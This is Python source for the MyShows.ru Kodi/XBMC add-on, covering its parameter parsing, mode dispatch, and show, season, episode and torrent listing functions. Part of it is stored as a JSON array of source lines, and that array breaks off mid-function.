        self.cur.execute("delete from watched where id=?", (id,))
        self.db.commit()
        self._close()

    def _connect(self):
        self.db = sqlite.connect(self.dbfilename)
        self.cur = self.db.cursor()

    def _close(self):
        self.cur.close()
        self.db.close()
def Test():
    """Developer scratchpad reached via mode 999 (debug setting only).

    Most of the body is intentionally commented-out experiments; the live
    part walks a hard-coded subtitle directory and shows a selection dialog.
    """
    #SyncXBMC()
    #RunPlugin='{"mode": "60", "argv": {"content": "videos"}}'
    #xbmc.executebuiltin('XBMC.RunPlugin('+sys.argv[0]+'?'+urllib.quote_plus(RunPlugin)+')')
    #print Rate('9237', '2031031', 'http://api.myshows.ru/profile/shows/9237/', True)
    #PluginStatus().use('myshows')
    '''
    import libtorrent
    for filename in xbmcvfs.listdir(r'D:\torrents')[1]:
        filelist=[]
        tor=os.path.join('D:\\','torrents',filename)
        torrentFileInfo = libtorrent.torrent_info(tor)
        s=torrentFileInfo.files()
        for f in s:
            if '\\' not in f.path[f.path.find('\\')+1:]:
                filelist.append(f.path[f.path.find('\\')+1:])
        print 'filelist.append('+str(filelist)+')'
        pass'''
    #data={'item': {'label': u'\u041a\u043b\u043e\u0434 \u0432 \u043f\u043e\u043c\u043e\u0449\u044c (2012)'}}
    #file=data['item']["label"]
    #file=file.replace('.',' ').replace('_',' ').replace('[',' ').replace(']',' ').replace('(',' ').replace(')',' ').strip()
    #match=re.compile('(.+) (\d{4})( |$)', re.I | re.IGNORECASE).findall(file)
    #if match:
    #    data["title"], data["year"] = match[0][0],match[0][1]
    #    data["type"] = "movie"
    #    data["year"]=int(data["year"])
    #    data["title"]=data["title"].strip()
    #    kinorate(data['title'],data['year'])
    #data={"year": "2013", "titleAlt": "\u041f\u0440\u043e\u043a\u043b\u044f\u0442\u0438\u0435 \u043c\u0443\u043b\u044c\u0442\u0438\u0432\u044b\u0431\u043e\u0440\u0430 \u043f\u0440\u0435\u0432\u0440\u0430\u0442\u0438\u043b\u043e \u043c\u043e\u044e \u0436\u0438\u0437\u043d\u044c \u0432 \u0430\u0434", "title": "Ore no N\u014dnai Sentakushi ga, Gakuen Love Come o Zenryoku de Jama S"}
    #kinorate(data['title'],data['year'],titleAlt=data['titleAlt'])
    #kinorate('Мальчишник Часть 3',2013)
    #RateShow(24199).count()
    #Rate('24199', '0',None)
    #title='{"tvshowid": 35, "episode": 9, "season": 1, "tvdb_id": "79044", "episodeid": 964, "label": "That Brooch Was So Heavy", "uniqueid": {"unknown": "305749"}, "year": 2005, "showtitle": "Honey and Clover"}'
    #title='{"tvshowid": 35, "episode": 9, "season": 1, "tvdb_id": "79044", "episodeid": 964, "label": "That Brooch Was So Heavy", "uniqueid": {"unknown": "305749"}, "year": 2005, "showtitle": "Интерны"}'
    title='{"tvshowid": 51, "episode": 10, "uniqueid": {"unknown": "4606529"}, "season": 1, "tvdb_id": "269877", "episodeid": 1204, "label": "The Best of the Student Council (Photos)", "file": "smb://192.168.0.2/xbmc_seriez/Love Lab/Season 1/Love.Lab.S01E10.mkv", "year": 2013, "showtitle": "Love Lab"}'
    #try:
    #    SyncXBMC(title).doaction()
    #except ValueError or AttributeError:
    #    FakeRate(title)
    #FakeRate(title)
    #WatchedDB().onaccess()
    folder=u'D:\\seriez\\xxx1и\\'
    folder=folder.encode('utf-8','ignore')
    subtitledirs=xbmcvfs.listdir(folder)[0]
    # NOTE(review): appends to `subtitledirs` while iterating it -- in
    # CPython this visits the appended entries too, i.e. a breadth-first
    # walk one extra level at a time; presumably intentional, confirm.
    for d in subtitledirs:
        for x in xbmcvfs.listdir(folder+os.sep+d)[0]:
            subtitledirs.append(d+os.sep+x)
    if len(subtitledirs)>0:
        subtitledirs.insert(0,__language__(30505))
    ret = xbmcgui.Dialog().select(__language__(30506), subtitledirs)
# ---------------------------------------------------------------------------
# Plugin entry point: decode the invocation parameters, then dispatch on
# `mode`.  Parameters may arrive either as a classic query string (params)
# or as a JSON "apps" payload; the apps values win because they are applied
# last.  Each lookup is wrapped individually so missing keys simply leave
# the corresponding global as None.
# ---------------------------------------------------------------------------
params = get_params()
try: apps=get_apps()
except: pass
showId = None
title = None
mode = None
seasonNumber = None
id = None
action = None
playcount = None
sort = None
episodeId = None
refresh_url = None
stringdata = None
try: title = urllib.unquote_plus(params['title'])
except: pass
try: showId = urllib.unquote_plus(params['showId'])
except: pass
try: seasonNumber = urllib.unquote_plus(params['seasonNumber'])
except: pass
try: mode = int(params['mode'])
except: pass
# NOTE(review): this apps['mode'] lookup is duplicated below; harmless.
try: mode = int(apps['mode'])
except: pass
try: id = urllib.unquote_plus(str(params['id']))
except: pass
try: episodeId = urllib.unquote_plus(str(params['episodeId']))
except: pass
try: playcount = str(params['playcount'])
except: pass
try: action = urllib.unquote_plus(params['action'])
except: pass
try: sort = str(params['sort'])
except: pass
try: refresh_url = urllib.unquote_plus(params['refresh_url'])
except: pass
try: stringdata = urllib.unquote_plus(params['stringdata'])
except: pass
try: title = urllib.unquote_plus(apps['title'])
except: pass
try: showId = str(urllib.unquote_plus(apps['argv']['showId']))
except: pass
try: seasonNumber = str(urllib.unquote_plus(apps['argv']['seasonNumber']))
except: pass
try: mode = int(apps['mode'])
except: pass
try: id = urllib.unquote_plus(str(apps['argv']['id']))
except: pass
try: episodeId = urllib.unquote_plus(str(apps['argv']['episodeId']))
except: pass
try: playcount = str(apps['argv']['playcount'])
except: pass
try: action = urllib.unquote_plus(apps['argv']['action'])
except: pass
try: sort = str(apps['argv']['sort'])
except: pass
try: refresh_url = urllib.unquote_plus(apps['argv']['refresh_url'])
except: pass
try: stringdata = urllib.unquote_plus(apps['argv']['stringdata'])
except: pass

# --- mode dispatch ---------------------------------------------------------
if mode == None:
    Main()
elif mode==1:
    # Replace the English strings with the Russian ones (one-shot language fix).
    import shutil
    ru=os.path.join(__addonpath__, u'resources',u'language',u'Russian')
    en=os.path.join(__addonpath__, u'resources',u'language',u'English')
    shutil.move(os.path.join(en, u'strings.xml'), os.path.join(en, u'old_strings.xml'))
    shutil.copy(os.path.join(ru, u'strings.xml'), en)
    showMessage(__language__(30208), __language__(30533))
elif mode >= 10 and mode <19:
    Shows()
    xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_TITLE)
elif mode == 19:
    Shows()
    xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_RATING)
elif mode == 20:
    Seasons(showId)
elif mode == 25:
    Episodes(showId, seasonNumber)
    xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_EPISODE)
elif mode == 27:
    xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_DATE)
    if not sort: EpisodeList('unwatched')
    else: ShowList('unwatched')
elif mode == 28:
    xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_DATE)
    if not sort: EpisodeList('next')
    else: ShowList('next')
elif mode == 30:
    EpisodeMenu(id, playcount, refresh_url)
elif mode == 40:
    FriendsNews()
elif mode == 41:
    if action==None: action=login
    if sort==None: sort='profile'
    Profile(action, sort)
elif mode == 50:
    MyTorrents()
elif mode == 51:
    MyScanList()
elif mode == 52:
    uTorrentBrowser()
elif mode == 60:
    ClearCache()
elif mode == 61:
    PluginStatus().menu()
elif mode == 62:
    ExtraFunction()
elif mode == 70:
    try:
        SyncXBMC(title).doaction()
        Debug('[mode 70]: SyncXBMC(title).doaction() success')
    # BUGFIX: `except ValueError or AttributeError:` only caught ValueError
    # (the `or` short-circuits on the first class object); use a tuple.
    except (ValueError, AttributeError):
        Debug('[mode 70]: ValueError or AttributeError, start FakeRate for %s' % (title))
        if action=='check': FakeRate(title)
elif mode == 71:
    try:
        get_data= get_url(cookie_auth, 'http://api.myshows.ru/profile/news/')
        WatchedDB().onaccess()
    except:
        showMessage(__language__(30520),__language__(30532))
elif mode in (2571,5171,302071,3071):
    MoveToXBMC()
elif mode == 610:
    PluginStatus().install(action)
elif mode == 611:
    PluginStatus().install_plugin(action)
elif mode == 100:
    if not action: action='all'
    TopShows(action)
elif mode == 200:
    Change_Status_Show(showId, action, refresh_url)
elif mode in (206,256,306):
    xbmc.executebuiltin("Action(Info)")
elif mode == 250:
    Change_Status_Season(showId, seasonNumber, action, refresh_url)
elif mode in (251,201,302):
    Rate(showId, id, refresh_url)
elif mode == 300:
    Change_Status_Episode(showId, id, action, playcount, refresh_url)
elif mode == 3000 or mode == 2500:
    VKSearch(showId, id)
elif mode == 3010:
    Source().addsource()
    jdata=get_apps(stringdata)
    if not sort: AskPlay()
    elif sort=='activate':
        if action!='silent': gotoCheckPoint()
        if action=='download' or action=='silent': DownloadSource()
    elif not jdata['id']: ScanSource().scanone()
elif mode == 3011:
    Source().addjson()
elif mode == 3012:
    Serialu().add()
elif mode == 3013:
    gotoCheckPoint()
elif mode == 3020:
    PlayFile()
elif mode == 3090:
    AskPlay()
elif mode == 301 or mode == 252:
    Favorite(id, refresh_url)
elif mode in (500,258):
    DeleteSourses()
elif mode == 510:
    ScanAll()
elif mode in (30202,259):
    ScanSource().scanone()
elif mode == 302001:
    ScanSource().add()
elif mode == 302002:
    ScanSource().delete()
elif mode in (30200,257):
    DeleteSource()
elif mode in (30201,25201):
    DownloadSource(stringdata)
elif mode == 303 or mode==203 or mode==253:
    AddSource()
elif mode == 304 or mode==204 or mode==254:
    PlaySource()
elif mode in (205,255):
    ontop('update', stringdata)
elif mode == 999:
    Test()

xbmcplugin.endOfDirectory(int(sys.argv[1]))
[ "# -*- coding: utf-8 -*-\n", "\n", "import urllib, re, sys, socket, json, os\n", "import xbmcplugin, xbmcgui, xbmc, xbmcaddon, xbmcvfs\n", "\n", "from functions import *\n", "from torrents import *\n", "from app import Handler, Link\n", "from rating import *\n", "\n", "__version__ = \"1.8.9\"\n", "__plugin__ = \"MyShows.ru \" + __version__\n", "__author__ = \"DiMartino\"\n", "__settings__ = xbmcaddon.Addon(id='plugin.video.myshows')\n", "__language__ = __settings__.getLocalizedString\n", "login=__settings__.getSetting(\"username\")\n", "ruName=__settings__.getSetting(\"ruName\")\n", "change_onclick=__settings__.getSetting(\"change_onclick\")\n", "cookie_auth=__settings__.getSetting(\"cookie_auth\")\n", "useTVDB=getSettingAsBool('tvdb')\n", "socket.setdefaulttimeout(30)\n", "__addonpath__= __settings__.getAddonInfo('path')\n", "icon = __addonpath__+'/icon.png'\n", "__tmppath__= os.path.join(__addonpath__, 'tmp')\n", "forced_refresh_data=__settings__.getSetting(\"forced_refresh_data\")\n", "refresh_period=int('1|4|12|24'.split('|')[int(__settings__.getSetting(\"refresh_period\"))])\n", "refresh_always=__settings__.getSetting(\"refresh_always\")\n", "striplist=['the', 'tonight', 'show', 'with', '(2005)', '(2009)', '(2012)', ' ', ' ', ' ', ' ', ' ', ' ', ' ']\n", "Debug('[SYS ARGV]: '+str(urllib.unquote_plus(sys.argv[2]))[1:])\n", "\n", "check_login = re.search('='+login+';', cookie_auth)\n", "if not check_login:\n", " cookie_auth=auth()\n", "\n", "class Main(Handler):\n", " def __init__(self):\n", " self.menu=[]\n", " menu_style=__settings__.getSetting(\"menu_style\")\n", " top=ontop()\n", " if top: self.menu.append(top)\n", " if menu_style=='1':\n", " self.menu.extend([{\"title\":__language__(30111),\"mode\":\"41\"},{\"title\":__language__(30100),\"mode\":\"10\"},\n", " {\"title\":__language__(30102),\"mode\":\"17\"},{\"title\":__language__(30150),\"mode\":\"18\"},\n", " 
{\"title\":__language__(30103),\"mode\":\"14\"},{\"title\":__language__(30104),\"mode\":\"15\"},\n", " {\"title\":__language__(30105),\"mode\":\"16\"},{\"title\":__language__(30106),\"mode\":\"27\"},\n", " {\"title\":__language__(30107),\"mode\":\"28\"}, {\"title\":__language__(30108),\"mode\":\"100\"},\n", " {\"title\":__language__(30112),\"mode\":\"40\"}, {\"title\":__language__(30101),\"mode\":\"19\"},\n", " {\"title\":__language__(30149),\"mode\":\"62\"},])\n", " else:\n", " self.menu.extend([{\"title\":__language__(30111),\"mode\":\"41\"},{\"title\":__language__(30139),\"mode\":\"13\"},\n", " {\"title\":__language__(30106),\"mode\":\"27\"},\n", " {\"title\":__language__(30107),\"mode\":\"28\"}, {\"title\":__language__(30108),\"mode\":\"100\"},\n", " {\"title\":__language__(30112),\"mode\":\"40\"}, {\"title\":__language__(30136),\"mode\":\"50\"},\n", " {\"title\":__language__(30137),\"mode\":\"60\"}, {\"title\":__language__(30101),\"mode\":\"19\"},\n", " {\"title\":__language__(30146),\"mode\":\"61\"}, {\"title\":__language__(30141),\"mode\":\"510\"}])\n", " if __settings__.getSetting(\"debug\")=='true':\n", " self.menu.append({\"title\":\"TEST\",\"mode\":\"999\"})\n", " self.handle()\n", " if __settings__.getSetting(\"autoscan\")=='true':\n", " auto_scan()\n", " friend_xbmc()\n", "\n", " def handle(self):\n", " for self.i in self.menu:\n", " try: argv=self.i['argv']\n", " except: argv={'content': 'videos'}\n", " self.item(Link(self.i['mode'], argv), title=unicode(self.i['title']))\n", "\n", "class ExtraFunction(Main):\n", " def __init__(self):\n", " self.menu=[]\n", " self.menu.extend([{\"title\":__language__(30136),\"mode\":\"50\"},\n", " {\"title\":__language__(30137),\"mode\":\"60\"},\n", " {\"title\":__language__(30146),\"mode\":\"61\"},\n", " {\"title\":__language__(30141),\"mode\":\"510\"},\n", " ])\n", " self.handle()\n", "\n", "def Shows():\n", " try: syncshows=SyncXBMC()\n", " except: syncshows=False\n", " saveCheckPoint()\n", " 
xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')\n", " #lockView('info')\n", " if mode==19:\n", " KB = xbmc.Keyboard()\n", " if action: KB.setDefault(unicode(action))\n", " KB.setHeading(__language__(30203))\n", " KB.doModal()\n", " if (KB.isConfirmed()) and KB.getText() not in [None,'']:\n", " data= Data(cookie_auth, 'http://api.myshows.ru/shows/search/?q='+urllib.quote_plus(KB.getText()))\n", " else:\n", " return\n", " else:\n", " data=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/')\n", "\n", " jload=data.get()\n", " if jload:\n", " jdata = json.loads(jload)\n", " else: return\n", "\n", " #if mode in(11,12):\n", " # next_data=json.loads(Data(cookie_auth, 'http://api.myshows.ru/profile/episodes/next/').get())\n", " #else:\n", " # next_data=[]\n", "\n", " if mode==13:\n", " menu=[{\"title\":TextBB(__language__(30100), 'b'),\"mode\":\"10\", \"argv\":{}},\n", " {\"title\":TextBB(__language__(30102), 'b'),\"mode\":\"17\", \"argv\":{}},\n", " {\"title\":TextBB(__language__(30150), 'b'),\"mode\":\"18\", \"argv\":{}},\n", " {\"title\":TextBB(__language__(30103), 'b'),\"mode\":\"14\", \"argv\":{}},\n", " {\"title\":TextBB(__language__(30104), 'b'),\"mode\":\"15\", \"argv\":{}},\n", " {\"title\":TextBB(__language__(30105), 'b'),\"mode\":\"16\", \"argv\":{}},]\n", " #{\"title\":TextBB('ONGOING', 'b'),\"mode\":\"11\", \"argv\":{}},\n", " #{\"title\":TextBB('FULLSEASON', 'b'),\"mode\":\"12\", \"argv\":{}},]\n", "\n", " for i in menu:\n", " link=Link(i['mode'], i['argv'])\n", " h=Handler(int(sys.argv[1]), link)\n", " h.item(link, title=unicode(i['title']))\n", "\n", "\n", " for showId in jdata:\n", " if ruName=='true' and jdata[showId]['ruTitle']:\n", " title=jdata[showId]['ruTitle'].encode('utf-8')\n", " else:\n", " title=jdata[showId]['title']\n", "\n", " if mode not in (10,11,12,19):\n", " if mode!=18 and jdata[showId]['watchStatus']==\"watching\" and jdata[showId]['totalEpisodes']-jdata[showId]['watchedEpisodes']==0:\n", " continue\n", " elif mode not in 
(13,17) and jdata[showId]['watchStatus']==\"watching\" and jdata[showId]['totalEpisodes']-jdata[showId]['watchedEpisodes']!=0:\n", " continue\n", " elif mode!=14 and jdata[showId]['watchStatus']==\"later\":\n", " continue\n", " elif mode!=15 and jdata[showId]['watchStatus']==\"finished\":\n", " continue\n", " elif mode!=16 and jdata[showId]['watchStatus']==\"cancelled\":\n", " continue\n", "\n", " if mode==19:\n", " rating=int(jdata[showId]['watching'])\n", " else:\n", " rating=float(jdata[showId]['rating'])\n", " pre=prefix(showId=int(showId))\n", "\n", " item = xbmcgui.ListItem(pre+title, iconImage='DefaultFolder.png', thumbnailImage=str(jdata[showId]['image']))\n", " info={'title': title, 'label':title, 'tvshowtitle': jdata[showId]['title'], 'rating': rating*2, 'votes':1, 'year': '', } #'playcount':jdata[showId]['watchedEpisodes'], 'episode':jdata[showId]['totalEpisodes'] НЕ ХОЧУ ГАЛКИ\n", " try:\n", " info['plot']=__language__(30265) % (str(jdata[showId]['watchedEpisodes']), str(jdata[showId]['totalEpisodes']))+'\\r\\n'+__language__(30266)+' '+str(rating)+'\\r\\n'\n", " except:info['plot']=''\n", " if syncshows: item=syncshows.shows(jdata[showId]['title'], item, info)\n", " else: item.setInfo( type='Video', infoLabels=info)\n", " stringdata={\"showId\":int(showId), \"seasonId\":None, \"episodeId\":None, \"id\":None}\n", " refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/')\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+refresh_url+'&showId=' + str(showId) + '&mode=20'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", "\n", "def Seasons(showId):\n", " data= Data(cookie_auth, 'http://api.myshows.ru/shows/'+showId)\n", " try: syncshows=SyncXBMC()\n", " except: syncshows=False\n", " saveCheckPoint()\n", " seasons, epdict=[], {}\n", " jdata = json.loads(data.get())\n", " for id in 
jdata['episodes']:\n", " seasonNumber=jdata['episodes'][id]['seasonNumber']\n", " if seasonNumber not in seasons:\n", " seasons.append(seasonNumber)\n", " epdict[str(jdata['episodes'][id]['seasonNumber'])]=str(jdata['episodes'][id]['id'])\n", " else:\n", " epdict[str(jdata['episodes'][id]['seasonNumber'])]=epdict[str(jdata['episodes'][id]['seasonNumber'])]+','+str(jdata['episodes'][id]['id'])\n", " seasons.sort()\n", " watched_data= Data(cookie_auth, 'http://api.myshows.ru/profile/shows/'+showId+'/')\n", " try:watched_jdata = json.loads(watched_data.get())\n", " except: watched_jdata=None\n", " ratedict={}\n", " if watched_jdata:\n", " epdict=sortcomma(epdict, watched_jdata)\n", " ratedict=RateShow(int(showId),watched_jdata).seasonrates()\n", "\n", " info={'label':jdata['title'], 'year':jdata['year']}\n", " meta, banners = None, []\n", " if syncshows and useTVDB: meta, banners = syncshows.episodes_meta(info)\n", " for sNumber in seasons:\n", " pre=prefix(showId=int(showId), seasonId=int(sNumber))\n", " title=pre+__language__(30138)+' '+str(sNumber)\n", " stringdata={\"showId\":int(showId), \"seasonId\":int(sNumber), \"episodeId\":None, \"id\":None}\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + str(showId) + '&seasonNumber=' + str(sNumber) + '&mode=25'\n", " item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage='')\n", " if epdict[str(sNumber)]=='': playcount=1\n", " else: playcount=0\n", " votes=1\n", " if ratedict.has_key(str(sNumber)): rating, votes=ratedict[str(sNumber)][0]*2,ratedict[str(sNumber)][1]\n", " else:rating=0\n", " info={'title': title, 'label':jdata['title'], 'season':int(sNumber), 'playcount': playcount, 'rating': rating, 'votes':votes, 'year':jdata['year']}\n", " if syncshows:\n", " item=syncshows.episodes(jdata['title'], item, info, meta)\n", " if banners:\n", " banner=season_banner(banners, int(sNumber))\n", " if banner: item.setThumbnailImage(banner)\n", " else: item.setInfo( type='Video', 
infoLabels=info )\n", "\n", " refresh_url='&refresh_url='+urllib.quote_plus(str(watched_data.url))\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", "\n", "def Episodes(showId, seasonNumber):\n", " #lockView('info')\n", " xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')\n", " data= Data(cookie_auth, 'http://api.myshows.ru/shows/'+showId)\n", " watched_data= Data(cookie_auth, 'http://api.myshows.ru/profile/shows/'+showId+'/')\n", " jdata = json.loads(data.get())\n", " try: syncshows=SyncXBMC()\n", " except: syncshows=False\n", " saveCheckPoint()\n", " try:watched_jdata = json.loads(watched_data.get())\n", " except: watched_jdata=[]\n", " fanart=None\n", " if syncshows:\n", " info={'label':jdata['title'], 'year':jdata['year']}\n", " fanart=syncshows.episode_fanart(info)\n", "\n", " for id in jdata['episodes']:\n", " if jdata['episodes'][id]['seasonNumber']==int(seasonNumber):\n", " if id in watched_jdata:\n", " playcount=1\n", " if watched_jdata[id]['rating']:\n", " rating=float(watched_jdata[id]['rating'])\n", " else: rating=0\n", " else:\n", " playcount=0\n", " rating=0\n", " pre=prefix(showId=int(showId),seasonId=jdata['episodes'][id]['seasonNumber'], id=int(id), stype=None, episodeNumber=jdata['episodes'][id]['episodeNumber'])\n", " if not pre and syncshows.episode(jdata['title'], jdata['episodes'][id]['seasonNumber'], jdata['episodes'][id]['episodeNumber']): pre='[B][XBMC][/B]'\n", " title=pre+jdata['episodes'][id]['title']+' ['+jdata['episodes'][id]['airDate']+']'\n", " item = xbmcgui.ListItem('%s. 
%s' % (str(jdata['episodes'][id]['episodeNumber']), title), iconImage=str(jdata['episodes'][id]['image']), thumbnailImage=str(jdata['episodes'][id]['image']))\n", " item.setInfo( type='Video', infoLabels={'Title': title,\n", " 'year': jdata['year'],\n", " 'episode': jdata['episodes'][id]['episodeNumber'],\n", " 'season': jdata['episodes'][id]['seasonNumber'],\n", " 'tracknumber': jdata['episodes'][id]['sequenceNumber'],\n", " 'playcount': playcount,\n", " 'rating': rating*2,\n", " 'tvshowtitle': jdata['title'],\n", " 'premiered': jdata['started'],\n", " 'status': jdata['status'],\n", " 'code': jdata['imdbId'],\n", " 'aired': jdata['episodes'][id]['airDate'],\n", " 'plot': __language__(30266)+' '+str(rating),\n", " 'votes': jdata['voted']} )\n", " stringdata={\"showId\":int(showId), \"episodeId\":jdata['episodes'][id]['episodeNumber'], \"id\":int(id), \"seasonId\":jdata['episodes'][id]['seasonNumber']}\n", " if fanart: item.setProperty('fanart_image', fanart)\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&seasonNumber='+seasonNumber+'&showId='+showId+'&episodeId='+str(jdata['episodes'][id]['episodeNumber'])+'&id=' + str(id) + '&playcount=' + str(playcount) + '&mode=30'\n", " refresh_url='&refresh_url='+urllib.quote_plus(str(watched_data.url))\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " sys_url=sys_url+refresh_url\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=False)\n", "\n", "def EpisodeMenu(id, playcount, refresh_url):\n", " if change_onclick=='true':\n", " xbmc.executebuiltin(\"Action(ToggleWatched)\")\n", " Change_Status_Episode(showId, id, action, playcount, refresh_url)\n", " else:\n", " xbmc.executebuiltin(\"Action(ContextMenu)\")\n", "\n", "def MyTorrents():\n", " myt=TorrentDB()\n", " if sort!='shows' and showId==None:\n", " menu=[{\"title\":TextBB(__language__(30114), 'b'), \"mode\":\"50\", \"argv\":{'sort':'shows'}},\n", " 
{\"title\":TextBB(__language__(30287), 'b'), \"mode\":\"52\", \"argv\":{}},\n", " {\"title\":TextBB(__language__(30140), 'b'), \"mode\":\"51\", \"argv\":{}},\n", " {\"title\":TextBB(__language__(30141), 'b'), \"mode\":\"510\", \"argv\":{}}]\n", " for i in menu:\n", " link=Link(i['mode'], i['argv'])\n", " h=Handler(int(sys.argv[1]), link)\n", " h.item(link, title=unicode(i['title']))\n", "\n", " data=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/').get()\n", " jdata = json.loads(data)\n", "\n", " if sort=='shows':\n", " showlist=[]\n", " listdict=myt.get_all()\n", " for x in listdict:\n", " try:\n", " str_showId=str(x['showId'])\n", " try:\n", " if ruName=='true' and jdata[str_showId]['ruTitle']: show_title=jdata[str_showId]['ruTitle']\n", " else: show_title=jdata[str_showId]['title']\n", " except KeyError: show_title=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get())['title']\n", " title=show_title\n", " if str_showId not in showlist:\n", " showlist.append(str_showId)\n", " item = xbmcgui.ListItem(title+' (%s)'%(str(myt.countshowId(str_showId))), iconImage='DefaultFolder.png', thumbnailImage='')\n", " item.setInfo( type='Video', infoLabels={'Title': title } )\n", " stringdata={\"showId\":x['showId'], \"seasonId\":None, \"episodeId\":None, \"id\":None}\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&sort=&showId='+str_showId+'&mode=50'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", " except:\n", " Debug('[MyTorrents] Something went wrong with showId %s' % (str_showId), True)\n", " xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_TITLE)\n", " else:\n", " if showId==None: listdict=myt.get_all()\n", " else: listdict=myt.get_all(showId=int(showId))\n", "\n", " for x in listdict:\n", " try:\n", " str_showId=str(x['showId'])\n", " 
str_seasonId=str(x['seasonId'])\n", " str_episodeId=str(x['episodeId'])\n", " str_id=str(x['id'])\n", " str_filename=unicode(x['filename'])\n", " try:\n", " if ruName=='true' and jdata[str_showId]['ruTitle']: show_title=jdata[str_showId]['ruTitle']\n", " else: show_title=jdata[str_showId]['title']\n", " except: show_title=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get())['title']\n", " title=''\n", " if prefix(stype=x['stype']): title=prefix(stype=x['stype'])\n", "\n", " if str_seasonId!='None': title=title+' S'+int_xx(str_seasonId)\n", " if str_episodeId!='None': title=title+'E'+int_xx(str_episodeId)\n", " title+=' '+show_title\n", " item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage='')\n", " item.setInfo( type='Video', infoLabels={'Title': title } )\n", " stringdata={\"showId\":x['showId'], \"episodeId\":x['episodeId'], \"id\":x['id'], \"seasonId\":x['seasonId']}\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&action='+urllib.quote_plus(str_filename.encode('utf-8'))+'&id='+str_id+'&mode=3020'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=False)\n", " except:\n", " Debug('[MyTorrents] Something went wrong with %s' % (str({\"showId\":x['showId'], \"episodeId\":x['episodeId'], \"id\":x['id'], \"seasonId\":x['seasonId']})), True)\n", "\n", "def MyScanList():\n", " myscan=ScanDB()\n", " data=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/').get()\n", " jdata = json.loads(data)\n", " listdict=myscan.get_all()\n", " for x in listdict:\n", " str_showId=str(x['showId'])\n", " str_seasonId=str(x['seasonId'])\n", " str_filename=unicode(x['filename'])\n", " try:\n", " if ruName=='true' and jdata[str_showId]['ruTitle']: show_title=jdata[str_showId]['ruTitle']\n", " else: show_title=jdata[str_showId]['title']\n", " except: show_title=json.loads(Data(cookie_auth, 
'http://api.myshows.ru/shows/'+str_showId).get())['title']\n", " ifstat=myscan.isfilename(str_filename)\n", " if ifstat: title=TextBB('+', 'b')\n", " else: title=TextBB('-', 'b')\n", " if prefix(stype=x['stype']): title+=prefix(stype=x['stype'])\n", " if str_seasonId!='None': title+=' S'+int_xx(str_seasonId)\n", " title+=' '+show_title\n", " item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage='')\n", " item.setInfo( type='Video', infoLabels={'Title': title } )\n", " stringdata={\"showId\":x['showId'], \"episodeId\":x['episodeId'], \"id\":x['id'], \"seasonId\":x['seasonId']}\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&action='+urllib.quote_plus(str_filename.encode('utf-8'))+'&mode=3020'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url, ifstat), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=False)\n", "\n", "def TopShows(action):\n", " xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')\n", " if action!='tvdb':saveCheckPoint()\n", " useTVDBtop=getSettingAsBool('tvdbtop')\n", " if action=='all':\n", " for i in [(__language__(30109),'male'),(__language__(30110),'female'),(__language__(30151),'recomm'),(__language__(30152),'friends'),(__language__(30156),'xbmcfriends'),(__language__(30155),'tvdb')]:\n", " item = xbmcgui.ListItem(TextBB(i[0], 'b'), iconImage='DefaultFolder.png', thumbnailImage='')\n", " item.setInfo( type='Video', infoLabels={'Title': unicode(i[0])} )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=str('%s?action=%s&mode=100' %(sys.argv[0], i[1])), listitem=item, isFolder=True)\n", " elif action in ['recomm','friends','xbmcfriends']:\n", " Recommendations(action)\n", " return\n", " elif action=='tvdb':\n", " if not useTVDBtop:\n", " dialog = xbmcgui.Dialog()\n", " ok=dialog.yesno(__language__(30519),__language__(30517),__language__(30518))\n", " if ok:\n", " __settings__.setSetting('tvdb','true')\n", " 
